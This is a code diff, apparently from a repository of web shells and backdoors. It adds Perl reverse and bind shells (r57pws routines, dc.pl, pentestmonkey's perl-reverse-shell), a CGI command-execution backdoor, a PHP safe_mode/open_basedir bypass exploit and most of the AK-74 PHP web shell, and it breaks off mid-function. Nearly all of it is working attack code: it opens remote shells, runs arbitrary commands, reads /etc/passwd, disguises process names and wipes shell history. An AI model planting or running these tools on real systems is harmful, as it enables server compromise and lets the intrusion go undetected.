+ {
+ print $lang[@_[0]]; 
+ }
+############### PORT BIND
+sub port_bind()
+ {
+ $SHELL=($unix)?('/bin/bash -i'):('cmd.exe');  
+ $LISTEN_PORT=@_[0]; 
+ use Socket; 
+ $protocol=getprotobyname('tcp'); 
+ socket(S,&PF_INET,&SOCK_STREAM,$protocol); 
+ setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); 
+ bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)); 
+ listen(S,3); 
+ while(1) 
+  { 
+  accept(CONN,S); 
+  if(!($pid=fork)) 
+   { 
+   die if (!defined $pid); 
+   open STDIN,"<&CONN"; 
+   open STDOUT,">&CONN"; 
+   open STDERR,">&CONN"; 
+   exec $SHELL; 
+   close CONN; 
+   exit 0; 
+   } 
+  }
+ }
+############### BACK CONNECT
+sub back()
+ {
+ use Socket; 
+ $cmd= "lynx"; 
+ $system = ($unix)?('echo "`uname -a`";echo "`id`";/bin/sh'):('cmd.exe'); 
+ $0=$cmd; 
+ $target=@_[0]; 
+ $port=@_[1]; 
+ $iaddr=inet_aton($target) || die("Error: $!\n"); 
+ $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); 
+ $proto=getprotobyname('tcp'); 
+ socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); 
+ connect(SOCKET, $paddr) || die("Error: $!\n"); 
+ open(STDIN, ">&SOCKET"); 
+ open(STDOUT, ">&SOCKET"); 
+ open(STDERR, ">&SOCKET"); 
+ system($system); 
+ close(STDIN); 
+ close(STDOUT); 
+ close(STDERR);
+ }
+############### LINK
+sub link()
+ {
+ print "<HTML><BODY><div align=center><font face=verdana size=1><b>DONE!<br><br><a href=$script_name>?????</a></b></font></div></BODY></HTML>";
+ }
+############### LOGIN FORM
+sub form_login()
+ {
+ print "Content-type: text/html\n\n";
+ print "<HTML><TITLE>r57pws - login</TITLE><BODY><div align=center><font face=verdana size=1>";
+ &l(25);
+ &form(0);
+ &input('password','PASS','',25,'<BR><BR>');
+ &input('submit','submit',$lang[26],undef,undef);
+ print "$f</font></div></BODY></HTML>";
+ }
+############### COOK
+sub cook()
+ {
+ @cookies = split(/; /,$ENV{'HTTP_COOKIE'});
+ foreach (@cookies)
+  {
+  ($f_n, $f_v) = split(/=/, $_);
+  $COOK{$f_n} = $f_v;
+  }
+ }
+############### CRY
+sub cry()
+ {
+ # just for fun
+ return crypt(crypt(crypt(shift,'c0'),'6a'),'ka');
+ }
+############### EOF

perl/dc.pl

@@ -0,0 +1,57 @@
+#!/usr/bin/perl 
+use IO::Socket; 
+#cONNECT BACKDOOR EDITED BY XORON          
+#lord@SlackwareLinux:/home/programing$ perl dc.pl 
+#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
+# 
+#Usage: dc.pl [Host] [Port] 
+# 
+#Ex: dc.pl 127.0.0.1 2121 
+#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 
+#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- 
+# 
+#[*] Resolving HostName 
+#[*] Connecting... 127.0.0.1 
+#[*] Spawning Shell 
+#[*] Connected to remote host 
+
+#bash-2.05b# nc -vv -l -p 2121 
+#listening on [any] 2121 ... 
+#connect to [127.0.0.1] from localhost [127.0.0.1] 32769 
+#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- 
+# 
+#--==Systeminfo==-- 
+#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux 
+# 
+#--==Userinfo==-- 
+#uid=1001(xoron) gid=100(users) groups=100(users) 
+# 
+#--==Directory==-- 
+#/root 
+# 
+#--==Shell==-- 
+# 
+$system    = '/bin/sh'; 
+$ARGC=@ARGV; 
+print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n"; 
+if ($ARGC!=2) { 
+  print "Usage: $0 [Host] [Port] \n\n"; 
+  die "Ex: $0 127.0.0.1 2121 \n"; 
+} 
+use Socket; 
+use FileHandle; 
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
+connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
+print "[*] Resolving HostName\n"; 
+print "[*] Connecting... $ARGV[0] \n"; 
+print "[*] Spawning Shell \n"; 
+print "[*] Connected to remote host \n"; 
+SOCKET->autoflush(); 
+open(STDIN, ">&SOCKET"); 
+open(STDOUT,">&SOCKET"); 
+open(STDERR,">&SOCKET"); 
+print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--  \n\n"; 
+system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo; 
+echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); 
+system($system); 
+#EOF

perl/perl-reverse-shell.pl

@@ -0,0 +1,124 @@
+#!/usr/bin/perl -w
+# perl-reverse-shell - A Reverse Shell implementation in PERL
+# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
+#
+# This tool may be used for legal purposes only.  Users take full responsibility
+# for any actions performed using this tool.  The author accepts no liability
+# for damage caused by this tool.  If these terms are not acceptable to you, then
+# do not use this tool.
+#
+# In all other respects the GPL version 2 applies:
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 as
+# published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License along
+# with this program; if not, write to the Free Software Foundation, Inc.,
+# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+# This tool may be used for legal purposes only.  Users take full responsibility
+# for any actions performed using this tool.  If these terms are not acceptable to
+# you, then do not use this tool.
+#
+# You are encouraged to send comments, improvements or suggestions to
+# me at pentestmonkey@pentestmonkey.net
+#
+# Description
+# -----------
+# This script will make an outbound TCP connection to a hardcoded IP and port.
+# The recipient will be given a shell running as the current user (apache normally).
+#
+
+use strict;
+use Socket;
+use FileHandle;
+use POSIX;
+my $VERSION = "1.0";
+
+# Where to send the reverse shell.  Change these.
+my $ip = '127.0.0.1';
+my $port = 1234;
+
+# Options
+my $daemon = 1;
+my $auth   = 0; # 0 means authentication is disabled and any 
+		# source IP can access the reverse shell
+my $authorised_client_pattern = qr(^127\.0\.0\.1$);
+
+# Declarations
+my $global_page = "";
+my $fake_process_name = "/usr/sbin/apache";
+
+# Change the process name to be less conspicious
+$0 = "[httpd]";
+
+# Authenticate based on source IP address if required
+if (defined($ENV{'REMOTE_ADDR'})) {
+	cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
+
+	if ($auth) {
+		unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
+			cgiprint("ERROR: Your client isn't authorised to view this page");
+			cgiexit();
+		}
+	}
+} elsif ($auth) {
+	cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
+	cgiexit(0);
+}
+
+# Background and dissociate from parent process if required
+if ($daemon) {
+	my $pid = fork();
+	if ($pid) {
+		cgiexit(0); # parent exits
+	}
+
+	setsid();
+	chdir('/');
+	umask(0);
+}
+
+# Make TCP connection for reverse shell
+socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
+if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
+	cgiprint("Sent reverse shell to $ip:$port");
+	cgiprintpage();
+} else {
+	cgiprint("Couldn't open reverse shell to $ip:$port: $!");
+	cgiexit();	
+}
+
+# Redirect STDIN, STDOUT and STDERR to the TCP connection
+open(STDIN, ">&SOCK");
+open(STDOUT,">&SOCK");
+open(STDERR,">&SOCK");
+$ENV{'HISTFILE'} = '/dev/null';
+system("w;uname -a;id;pwd");
+exec({"/bin/sh"} ($fake_process_name, "-i"));
+
+# Wrapper around print
+sub cgiprint {
+	my $line = shift;
+	$line .= "<p>\n";
+	$global_page .= $line;
+}
+
+# Wrapper around exit
+sub cgiexit {
+	cgiprintpage();
+	exit 0; # 0 to ensure we don't give a 500 response.
+}
+
+# Form HTTP response using all the messages gathered by cgiprint so far
+sub cgiprintpage {
+	print "Content-Length: " . length($global_page) . "\r
+Connection: close\r
+Content-Type: text\/html\r\n\r\n" . $global_page;
+}

perl/perlcmd.cgi

@@ -0,0 +1,34 @@
+#!/usr/bin/perl -w
+
+use strict;
+
+print "Cache-Control: no-cache\n";
+print "Content-type: text/html\n\n";
+
+my $req = $ENV{QUERY_STRING};
+	chomp ($req);
+	$req =~ s/%20/ /g; 
+	$req =~ s/%3b/;/g;
+
+print "<html><body>";
+
+print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
+
+	if (!$req) {
+		print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
+	}
+	else {
+		print "Executing: $req";
+	}
+
+	print "<pre>";
+	my @cmd = `$req`;
+	print "</pre>";
+
+	foreach my $line (@cmd) {
+		print $line . "<br/>";
+	}
+
+print "</body></html>";
+
+# <!--    http://michaeldaw.org   2006    -->

php/529.php

@@ -0,0 +1,58 @@
+<?php 
+/* 
+safe_mode and open_basedir Bypass PHP 5.2.9 
+KingDefacer ARCHÝVES / 
+
+This Exploit Was Edited By KingDefacer
+NOTE: 
+ 
+
+*/ 
+
+if(!empty($_GET['file'])) $file=$_GET['file']; 
+else if(!empty($_POST['file'])) $file=$_POST['file']; 
+
+echo '<PRE><P>This is exploit from <a 
+href="/" title="Securityhouse">Security House - Shell Center - Edited By KingDefacer</a> labs. 
+Turkish H4CK3RZ 
+<p><b> [Turkish Security Network] - Edited By KingDefacer
+<p>PHP 5.2.9 safe_mode & open_basedir bypass 
+<p>More: <a href="/">Md5Cracking.Com Crew</a> 
+<p><form name="form" action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_N 
+AME"]).$_SERVER["PHP_SELF"].'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="Show"></form>'; 
+
+
+$level=0; 
+
+if(!file_exists("file:")) 
+    mkdir("file:"); 
+chdir("file:"); 
+$level++; 
+
+$hardstyle = explode("/", $file); 
+
+for($a=0;$a<count($hardstyle);$a++){ 
+    if(!empty($hardstyle[$a])){ 
+        if(!file_exists($hardstyle[$a]))  
+            mkdir($hardstyle[$a]); 
+        chdir($hardstyle[$a]); 
+        $level++; 
+    } 
+} 
+
+while($level--) chdir(".."); 
+
+$ch = curl_init(); 
+
+curl_setopt($ch, CURLOPT_URL, "file:file:///".$file); 
+
+echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">'; 
+
+if(FALSE==curl_exec($ch)) 
+die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.'); 
+echo ' </textarea> </FONT>'; 
+
+curl_close($ch); 
+
+?> 
+bypass shell:

php/AK-74 Security Team Web Shell Beta Version.php

@@ -0,0 +1,640 @@
+<?
+/*                              
+
+.:: :[AK-74 Security Team Web Shell Beta Version]: ::.
+
+- AK-74 Security Team Web Site: www.ak74-team.net
+- Released on 01 June 2006.
+- Copyright AK-74 Security Team, 2006.
+- Thank you for using our script. 
+
+*/
+error_reporting(0); 
+set_time_limit(0);
+session_start();
+$xshell = $SERVER_['PHP_SELF'];
+class shell
+{
+
+ function getfiles()
+ {
+  $mas = array();
+  $i = 0;
+  if ($handle = opendir($_SESSION['currentdir']))
+  {
+   while (false !== ($file = readdir($handle)))
+   if ($file != '..')
+    if (!is_dir($_SESSION['currentdir'].'/'.$file))
+	{
+     $mas[$i]['filename'] = $file;
+	 $mas[$i]['filesize'] = filesize($_SESSION['currentdir'].'/'.$file);
+	 $mas[$i]['lastmod'] = date("H.i/d.m.Y", filemtime($_SESSION['currentdir'].'/'.$file));
+	 $i++;
+	}
+   closedir($handle); 
+  }
+  return $mas;
+ }
+
+ function getdirs()
+ {
+  $mas = array();
+  if ($handle = opendir($_SESSION['currentdir']))
+  {
+   while (false !== ($dir = readdir($handle)))
+    if ($dir != '.' && is_dir($_SESSION['currentdir'].'/'.$dir))
+     $mas[] = $dir;
+   closedir($handle); 
+  }
+  return $mas;
+ }
+
+ function geturl()
+ {
+  if ($_SESSION['currentdir'].'/' == $_SERVER['DOCUMENT_ROOT'])
+   return '/';
+  if (strpos($_SESSION['currentdir'],str_replace('\\','/',$_SERVER['DOCUMENT_ROOT'])) === false)
+   return '';
+  return str_replace($_SERVER['DOCUMENT_ROOT'],'',$_SESSION['currentdir'].'/');
+ }
+
+ 
+ function removefile()
+ {
+  if (file_exists($_GET['file']))
+  {
+   chmod($_GET['file'],0777);
+   if (unlink($_GET['file']))
+    return 'Ôàéë óäàëåí!';
+   else
+    return 'Ôàéë óäàëåí!';
+  }
+  else
+   return 'Ôàéë íå íàéäåí!';
+ }
+
+  function removedir()
+ {
+   chmod($_GET['dir'],0777);
+   if (rmdir($_GET['dir']))
+    return 'Äèðåêòîðèÿ óäàëåíà!';
+   else
+    return 'Äèðåêòîðèÿ íå íàéäåía!';
+ }
+ 
+function getmicrotime()
+{
+ list($usec, $sec) = explode(" ",microtime()); 
+ return ((float)$usec + (float)$sec); 
+} 
+
+function getpermission($path)
+{
+
+$perms = fileperms($path);
+
+if (($perms & 0xC000) == 0xC000)
+ $info = 's';
+elseif (($perms & 0xA000) == 0xA000)
+ $info = 'l';
+elseif (($perms & 0x8000) == 0x8000)
+ $info = '-';
+elseif (($perms & 0x6000) == 0x6000)
+ $info = 'b';
+elseif (($perms & 0x4000) == 0x4000)
+ $info = 'd';
+elseif (($perms & 0x2000) == 0x2000)
+ $info = 'c';
+elseif (($perms & 0x1000) == 0x1000)
+ $info = 'p';
+else
+ $info = 'u';
+
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
+
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
+
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
+
+return $info;
+}
+
+function getpermissionarray($path)
+{
+$res = array();
+$perms = fileperms($path);
+
+if (($perms & 0xC000) == 0xC000)
+ $res[] = 's';
+elseif (($perms & 0xA000) == 0xA000)
+ $res[] = 'l';
+elseif (($perms & 0x8000) == 0x8000)
+ $res[] = '-'; 
+elseif (($perms & 0x6000) == 0x6000)
+ $res[] = 'b';
+elseif (($perms & 0x4000) == 0x4000)
+ $res[] = 'd';
+elseif (($perms & 0x2000) == 0x2000)
+ $res[] = 'c';
+elseif (($perms & 0x1000) == 0x1000)
+ $res[] = 'p';
+else
+ $res[] = 'u';
+
+$res[] = (($perms & 0x0100) ? 'r' : '-');
+$res[] = (($perms & 0x0080) ? 'w' : '-');
+$res[] = (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
+
+$res[] = (($perms & 0x0020) ? 'r' : '-');
+$res[] = (($perms & 0x0010) ? 'w' : '-');
+$res[] = (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
+
+$res[] = (($perms & 0x0004) ? 'r' : '-');
+$res[] = (($perms & 0x0002) ? 'w' : '-');
+$res[] = (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
+
+return $res;
+}
+
+function outputhead()
+{
+$res = '';
+$res .= '<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"></head>
+<body>
+<STYLE>
+A:link {
+	COLOR: #4d6d91; TEXT-DECORATION: underline
+}
+A:active {
+	COLOR: #4d6d91; TEXT-DECORATION: underline
+}
+A:visited {
+	COLOR: #4d6d91; TEXT-DECORATION: underline
+}
+A:hover {
+	COLOR: #C10000; TEXT-DECORATION: underline
+}
+TD {
+	FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica
+}
+BODY {
+	FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; 
+}
+</STYLE>
+<div align="center"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">
+ <tr>
+  <td colspan=7 align="center">
+   <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: ::.</font></b>
+  </td>
+ </tr>';
+return $res;
+}
+
+function outputmenu()
+{
+ $res = '';
+ $res .= '<tr>
+  <td colspan=7 align="center">
+   <table border=0 cellspacing=0 cellpadding=0>
+    <tr align="center">
+	 <td width=150>
+	  <a href="'.$xshell.'?act=info">Îáùàÿ èíôîðìàöèÿ</a>
+	 </td>
+	 <td width=150>
+	  <a href="'.$xshell.'?act=filemanager">Ôàéëîâûé ìåíåäæåð</a>
+	 </td>
+	 <td width=80>
+	  <a href="'.$xshell.'?act=phpinfo" target="_blank">phpinfo()</a>
+	 </td>
+	 <td width=110>
+	  <a href="'.$xshell.'?act=execute">Âûïîëíèòü PHP</a>
+	 </td>
+	 <td width=150>
+	  <a href="'.$xshell.'?act=exesys">Âûïîëíèòü êîìàíäó</a>
+	 </td>
+      </tr>
+   </table>
+  </td>
+ </tr>';
+ return $res;
+}
+
+function outputdown()
+{
+ $res = '';
+ $res .= '</table></div></body></html>';
+ return $res;
+}
+
+function outputfilemanager()
+{
+$res = ''; 
+$number = 0;
+$dirs = $this->getdirs();
+$files = $this->getfiles();
+sort($dirs);
+sort($files);
+
+$res .= '
+ <tr>
+  <td colspan=7 align="center">
+  <font color=#830000> Òåêóùàÿ äèðåêòîðèÿ:</font><b><font color=#830000>'.$_SESSION['currentdir'].'</font></b>
+  </td>
+ </tr>
+ <tr align="center">
+  <td width=30>
+   &nbsp;
+  </td>
+  <td width=330>
+   &nbsp;
+  </td>
+  <td width=80><font color=#830000>Ðàçìåð,</font> <b><font color=#830000>áàéò</font></b>
+   &nbsp;
+  </td>
+  <td width=120><font color=#830000>
+   Ïîñëåäíåå èçìåíåíèå
+   </font>
+  </td>
+  <td width=80 align="center"><font color=#830000>Ïðàâà äîñòóïà</font>
+   &nbsp;
+  </td>
+  <td width=30>
+   &nbsp;
+  </td>
+  <td width=30>
+   &nbsp;
+  </td>
+ </tr>';
+
+for ($i = 0; $i < count($dirs); $i++)
+{
+ $res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td><td><b><a href="'.$xshell.'?act=filemanager&dir='.$dirs[$i].'">'.$dirs[$i].'</a></b></td><td>&nbsp;</td><td>&nbsp;</td><td>';
+ $res .= '<a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$dirs[$i].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$dirs[$i])).'</a>';
+ $res .= '</td><td>&nbsp;</td><td><a href="'.$xshell.'?act=filemanager&act3=del&dir='.$_SESSION['currentdir'].'/'.$dirs[$i].'">delete</a></td></tr>';
+}
+for ($i = 0; $i < count($files); $i++)
+{
+ $res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td>';
+ $res .= '<td><a href="'.$xshell.'?act=down&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.$files[$i]['filename'].'</a></td>';
+ $res .= '<td>&nbsp;&nbsp;'.$files[$i]['filesize'].'</td>';
+ $res .= '<td align="center">'.$files[$i]['lastmod'].'</td>';
+ $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$files[$i]['filename'])).'</a></td>';
+ $res .= '<td align="center"><a href="'.$xshell.'?act=edit&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">edit</a></td>';
+ $res .= '<td align="center"><a href="'.$xshell.'?act=filemanager&act2=del&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">delete</a></td></tr>';
+}
+$res .= '</table><br>';
+
+$res .= '<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">';
+$res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="mkdir"><b><font color=#830000>Ñîçäàòü äèðåêòîðèþ:</b></font> </td><td><input type="text" name="dircreate"><input type="submit" value="Ñîçäàòü"></form></td></tr>';
+$res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="createfile"><b><font color=#830000>Ñîçäàòü ôàéë:</b></font></td><td> <input type="text" name="filecreate"><input type="submit" value="Ñîçäàòü"></form></td></tr>';
+$res .= '<tr><td align=center><form enctype="multipart/form-data" action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="uploadfile"><b><font color=#830000>Çàêà÷àòü ôàéë:</font></b></td><td><input type="file" name="filename" size="23"> <b><font color=#830000>è ïðèñâîèòü èìÿ</b></font></td><td> <input type="text" name="filename2"><input type="submit" value="Âïåð¸ä"></form></td></tr>';
+$res .= '<table border=0 width="700" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">';
+$res .= '<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+return $res;
+}
+
+function outputinfo()
+{
+ $res = '';
+ $res .= '<tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Îáùàÿ èíôîðìàöèÿ î ñåðâåðå</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="left"><br>
+   <ol>
+    <b><font color=#830000>1. OS - </font></b><font color=#830000>'.(php_uname()).'</font><br><br>
+    <b><font color=#830000>2.  Âåðñèÿ PHP - </font></b><font color=#830000>'.(phpversion()).'</font><br><br>
+    <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - '.( get_current_user()).' <b><font color=#830000>|| User ID</font></b> - '.( getmyuid()).' <b><font color=#830000>|| Group ID</b></font> - '.( getmygid ()).'</font><br><br>
+    <b><font color=#830000>4. Server Software - </font></b><font color=#830000>'.(getenv('SERVER_SOFTWARE')).'</font><br><br>
+    <b><font color=#830000>5. Request Method - </font></b><font color=#830000>'.(getenv('REQUEST_METHOD')).'</font><br><br>
+    <b><font color=#830000>6. Server IP - </font></b><font color=#830000>'.(getenv('SERVER_ADDR')).'</font><br><br>
+    <b><font color=#830000>7. Your IP - </font></b><font color=#830000>'.(getenv('REMOTE_ADDR')).'</font><br><br>
+	<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.(getenv('HTTP_X_FORWARDED_FOR')).'</font><br><br>
+</td>
+ </tr>
+ <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
+<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+
+ return $res;
+}
+
+function chmodform($file)
+{
+$perms = $this->getpermissionarray($file);
+$res = '';
+$res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="chmod">'
+       .'<input type="hidden" name="file" value="'.$file.'">
+ <tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Èçìåíåíèå ïðàâ äîñòóïà</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0>';
+$res .= '<tr align="center"><td>&nbsp;</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>';
+$res .= '<tr><td><input type="hidden" name="perms0" value="'.$perms[0].'">'.$perms[0].'</td>';
+for ($i = 1; $i <= 9; $i++)
+ $res .= '<td><input type="checkbox" name="perms'.$i.'"'.(($perms[$i] != '-') ? ' checked' : '' ).'></td>';
+$res .= '</tr><tr><td colspan=10 align="right"><input type="submit" value="Ñîõðàíèòü"></td></tr>';
+$res .= '</table></td></tr></form>';
+return $res;
+}
+
+function editfileform($file)
+{
+$fp = fopen($file,'r');
+if (!$fp)
+ return 'Ðåäàêòèðîâàíèå ôàéëà';
+$res = '';
+$res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="editfile">'
+       .'<input type="hidden" name="file" value="'.$file.'"><tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Ðåäàêòèðîâàíèå ôàéëà</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0>';
+ $res .= '<tr><td><textarea rows=25 cols=100 name="filecontent">'.(htmlspecialchars(fread($fp, filesize($file)))).'</textarea></td></tr>';
+ $res .= '<tr><td align="right"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value='.$file.'> - <input type="submit" value="Ðåäàêòèðîâàòü"></td></tr>';
+ $res .= '</table></td></tr></form>';
+ fclose($fp);
+ return $res;
+}
+
+function executeform()
+{
+ $res = '';
+ $res .= '<form action="'.$xshell.'?act=execute" method="post"><input type="hidden" name="action" value="execute">
+ <tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Âûïîëíåíèå PHP-êîäà<br> Îòêðûòèå è çàêðûòèå PHP êîäà ( &lt;? è ?> ) ïèñàòü íå íóæíî!</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name="phpcode">';
+ $res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="Âûïîëíèòü"></td></tr></table></td></tr>
+ <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
+<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+ return $res;
+}
+
+function execute()
+{
+echo "<hr>";
+echo "<pre>";
+eval(stripslashes($_POST['phpcode']));
+echo "</pre>";
+echo "<hr>";
+ }
+
+function exesysform()
+{
+ $res = '';
+  $res .= '<form action="'.$xshell.'?act=exesys" method="post"><input type="hidden" name="action" value="exesys">
+ <tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Execute system commands!</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name="cmmd">';
+ $res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="Âûïîëíèòü"></td></tr></table></td></tr>
+ <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
+<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+ return $res;
+}
+
+function exesys()
+{
+echo "<hr>";
+echo "<pre>";
+$result = passthru($_POST['cmmd']);
+echo "</pre>";
+echo "<hr>";
+}
+
+function editfile($file)
+{
+if (!empty($_POST['rename'])) {
+rename ($_POST['file'], $_POST['rename']);
+}
+ $fp = fopen($_POST['rename'],'w');
+ if (!$fp)
+  return 0;
+ fwrite($fp, stripslashes($_POST['filecontent']));
+ fclose($fp);
+ return 1;
+}
+ 
+function chmodfile($file)
+{
+ $res = 0;
+ switch ($_POST['perms0'])
+ {
+  case 's':
+   $res = $res | 0xC000;
+  break;
+  case 'l':
+   $res = $res | 0xA000;
+  break;
+  case '-':
+   $res = $res | 0x8000;
+  break;
+  case 'b':
+   $res = $res | 0x6000;
+  break;
+  case 'd':
+   $res = $res | 0x4000;
+  break;
+  case 'c':
+   $res = $res | 0x2000;
+  break;
+  case 'p':
+   $res = $res | 0x1000;
+  break;
+  case 'u':
+
+  break;
+ }
+if (isset($_POST['perms1']))
+ $res = $res | 0x0100;
+if (isset($_POST['perms2']))
+ $res = $res | 0x0080;
+if (isset($_POST['perms3']))
+ $res = $res | 0x0040;
+
+if (isset($_POST['perms4']))
+ $res = $res | 0x0020;
+if (isset($_POST['perms5']))
+ $res = $res | 0x0010;
+if (isset($_POST['perms6']))
+ $res = $res | 0x0008;
+
+if (isset($_POST['perms7']))
+ $res = $res | 0x0004;
+if (isset($_POST['perms8']))
+ $res = $res | 0x0002;
+if (isset($_POST['perms9']))
+ $res = $res | 0x0001;
+echo substr(sprintf('%o', $res), -4);
+return chmod($file,intval(substr(sprintf('%o', $res), -4),8));
+
+}
+
+function downloadfile($file)
+{
+header ("Content-Type: application/octet-stream");
